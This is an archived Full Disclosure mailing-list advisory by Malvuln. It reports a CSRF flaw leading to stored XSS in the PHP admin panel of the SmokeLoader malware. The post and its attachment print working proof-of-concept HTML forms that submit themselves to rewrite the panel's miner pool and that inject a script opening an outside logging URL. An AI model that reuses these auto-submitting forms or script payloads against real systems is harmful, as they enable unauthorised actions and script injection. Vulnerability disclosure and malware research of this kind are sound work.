[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Panel.SmokeLoader / Cross Site Request Forgery (CSRF)
From: malvuln <malvuln13 () gmail ! com>
Date: 2024-05-13 4:06:06
Message-ID: CAAHK0WRK-VBH17wT9huuMQ3M65PqGPm=j5h1HLJM+CVmgWf==g () mail ! gmail ! com
[Download RAW message or body]
Updated and fixed a payload typo and added additional info regarding the
stored persistent XSS see attached.
Thanks, Malvuln
On Sat, May 11, 2024 at 12:56 AM malvuln <malvuln13@gmail.com> wrote:
> Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
> Original source:
> https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt
> Contact: malvuln13@gmail.com
> Media: twitter.com/malvuln
>
> Threat: Panel.SmokeLoader
> Vulnerability: Cross Site Request Forgery (CSRF)
> Family: SmokeLoader
> Type: Web Panel
> MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)
> SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
> Vuln ID: MVID-2024-0682
> Disclosure: The smokebot admin web panel is written in PHP for remote
> administration capability. The panel has multiple features like Bot List,
> Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP
> page contains an HTML FORM using POST method, however there is no CSRF
> security token used by the FORM. This is a unique token per session within
> the FORM, used as a challenge to the server to help prevent
> cross-site-scripting attacks. Therefore, third-party adversaries who can
> lure a panel user to visit an attacker controlled webpage or click an
> infected link may result in the panel users submitting FORMS on an
> attackers behalf. This may result in code execution, data theft, GEO
> location disclosure.
>
>
> Exploit/PoC:
> 1) CSRF to add your own Miner Pool
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value="MyPoolFool:666"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
> Password: %3Cinput type="input" name="miner_pass" size="20"
> value="malvuln"%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
> 2) CSRF to XSS
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value=""/%3E%3Cscript%3Ewindow.open('
> https://www.malvuln.com/log.php')%3C/script%3E"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value=""%3E
> Password: %3Cinput type="input" name="miner_pass" size="20" value=""%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
>
> Disclaimer: The information contained within this advisory is supplied
> "as-is" with no warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and that due
> credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit is given to
> the author. The author is not responsible for any misuse of the information
> contained herein and accepts no responsibility for any damage caused by the
> use or misuse of this information. The author prohibits any malicious use
> of security related information or exploits by the author or elsewhere. Do
> not attempt to download Malware samples. The author of this website takes
> no responsibility for any kind of damages occurring from improper Malware
> handling or the downloading of ANY Malware mentioned on this website or
> elsewhere. All content Copyright (c) Malvuln.com (TM).
>
["4b5fc3a2489985f314b81d35eac3560f_B.txt" (text/plain)]
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Panel.SmokeLoader
Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSS
Family: SmokeLoader
Type: Web Panel
MD5: 4b5fc3a2489985f314b81d35eac3560f (control.php)
SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
Vuln ID: MVID-2024-0682
Disclosure: The smokebot admin web panel is written in PHP for remote administration \
capability.
The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger \
etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no \
CSRF security token used by the FORM. This is a unique token per session within the FORM, used \
as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, \
third-party adversaries who can lure a panel user to visit an attacker controlled webpage or \
click an infected link may result in the panel users submitting FORMS on an attackers behalf. \
This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results \
in stored JS payload in the smoke MySQL database table "plugins".
Will be stored in the MySQL Database "plugins" table.
hash fgfilter fakedns_rules filesearch_rules procmon_rules ddos_rules keylog_rules \
fgcookies miner_rules 93666df0833e0b63917e5373812613 0 \
""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...
Exploit/PoC:
1) CSRF to add your own Miner Pool
%3Cform method="post" \
action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E
Pool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E
Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E
%3Cinput type="hidden" name="mode" value="miner"%3E
%3Cinput type="submit" value="SAVE"%3E
%3Cscript%3Edocument.forms[0].submit()%3C/script%3E
%3C/form%3E
2) CSRF to Persistent XSS
%3Cform method="post" \
action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3E
Pool: %3Cinput type="input" name="miner_pool" size="300" \
value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E \
Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
Password: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E
%3Cinput type="hidden" name="mode" value="miner"%3E
%3Cinput type="submit" value="SAVE"%3E
%3Cscript%3Edocument.forms[0].submit()%3C/script%3E
%3C/form%3E
Disclaimer: The information contained within this advisory is supplied "as-is" with no \
warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the \
redistribution of this advisory, provided that it is not altered except by reformatting it, and \
that due credit is given. Permission is explicitly given for insertion in vulnerability \
databases and similar, provided that due credit is given to the author. The author is not \
responsible for any misuse of the information contained herein and accepts no responsibility \
for any damage caused by the use or misuse of this information. The author prohibits any \
malicious use of security related information or exploits by the author or elsewhere. Do not \
attempt to download Malware samples. The author of this website takes no responsibility for any \
kind of damages occurring from improper Malware handling or the downloading of ANY Malware \
mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic